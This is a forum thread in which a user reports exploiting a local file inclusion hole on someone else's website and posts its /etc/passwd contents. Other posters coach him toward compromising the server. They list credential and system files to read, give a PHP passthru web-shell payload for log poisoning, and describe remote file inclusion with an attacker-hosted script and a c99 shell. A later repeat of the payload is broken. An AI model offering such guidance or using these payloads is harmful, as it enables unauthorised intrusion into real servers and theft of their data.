LFI passwd question
Ok well I was messing around testing sites for LFI when I found a vulnerable one. I was able to get the passwd file:
root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news: uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin dbus:x:81:81:System message bus:/:/sbin/nologin vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin rpm:x:37:37::/var/lib/rpm:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin netdump:x:34:34:Network Crash Dump user:/var/crash:/bin/bash nscd:x:28:28:NSCD Daemon:/:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin pcap:x:77:77::/var/arpwatch:/sbin/nologin xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin pegasus:x:66:65:tog-pegasus OpenPegasus WBEM/CIM services:/var/lib/Pegasus:/sbin/nologin named:x:25:25:Named:/var/named:/sbin/nologin mysql:x:100:101:MySQL server:/var/lib/mysql:/bin/bash mailman:x:32001:32001::/usr/local/cpanel/3rdparty/mailman:/bin/bash cpanel:x:32002:32003::/usr/local/cpanel:/bin/bash postgres:x:26:26:PostgreSQL Server:/var/lib/pgsql:/bin/bash nagios:x:32003:32004::/home/nagios:/bin/bash scormgr:x:32004:32006::/home/scormgr:/usr/local/cpanel/bin/noshell securet:x:32005:32007::/home/securet:/usr/local/cpanel/bin/noshell whmadm:x:32006:32008::/home/whmadm:/bin/bash node:x:32007:32009::/home/node:/bin/bash lpxts21:x:32008:32010::/home/lpxts21:/usr/local/cpanel/bin/noshell
Now since there is an x for the password, there should be a shadow file correct? but there is none, or at least it's not in etc/shadow.. And sorry for sounding stupid, but how do I get the password and better yet, what do I do once I have it.. lol Thanx
[[Richo turned off smilies]]
jbjoker wrote: I actually didn't plan on either. I was just learning and experimenting just to see if I could do it and how it works. I want to know what my options are and where the password really is.
Well, this may sound somewhat mean, but it's in no intention to do so.
I did not see, "better yet, what do I do once I have it.." in your initial post. You must first ask yourself what you are looking for/trying to do before you ask how you do it. If that made as much sense to you as it did in my head.
But, to help you along the way of experimentation, here's a typical list of "interesting" files to look at: /etc/passwd /etc/shadow /etc/group /etc/security/group /etc/security/passwd /etc/security/user /etc/security/environ /etc/security/limits /usr/lib/security/mkuser.default
Another, maybe more interesting one for you to try is making a shell using their own logs. Simply find the file in which stores failed pages (404, not found, etc.) and do:
markuphttp://www.site.com/<?php passthru($_GET['cmd']);?>
and then include the log file in your lfi. This will give you access to run commands. But, the thing you need to know is that you can't do this through your browser because it encodes the page. So, find another way to do it that's not through your browser ;). Shouldn't be that hard.
Well the LFI vulnerablilty is in a file called wrapper.php. It allows me to view files without any restrictions. I want RFI so I could use the script suggested before. It doesn't work when I try to execute http://www.example.com/wrapper.php?file=http://www.mysite.com/passhtroughscript.php
I'm not sure what you meant before about using their logs to help me. BTW keep in mind that I'm not that familiar with Linux if you haven't noticed already. As for those interesting files, the only one that existed was group. So once again, I have no passwords or any clue on how to get a remote shell.. I have phpterm, I just can't get it to work. I'm getting confused now. help?
try to include http://google.com just to make sure RFI works as well as LFI. if it does, just include a c99 shell and browse to /etc to find whats there.
jbjoker wrote: Well the LFI vulnerablilty is in a file called wrapper.php. It allows me to view files without any restrictions. I want RFI so I could use the script suggested before. It doesn't work when I try to execute http://www.example.com/wrapper.php?file=http://www.mysite.com/passhtroughscript.php
I'm not sure what you meant before about using their logs to help me. BTW keep in mind that I'm not that familiar with Linux if you haven't noticed already. As for those interesting files, the only one that existed was group. So once again, I have no passwords or any clue on how to get a remote shell.. I have phpterm, I just can't get it to work. I'm getting confused now. help?
For your RFI, in your example it shows that there are no extensions added, which isn't common. Put a ? at the end of your rfi example and then try it. So: http://www.mysite.com/passthroughscript.php?
Using the logs to help you. ->
You should find a way to pass:
markuphttp://www.site.com/<?php $_GET['cmd'];?>
without using a browser. Then, you need to find where the logs are kept that keeps track of invalid page attempts. Then, you include that page in your LFI and the php will execute.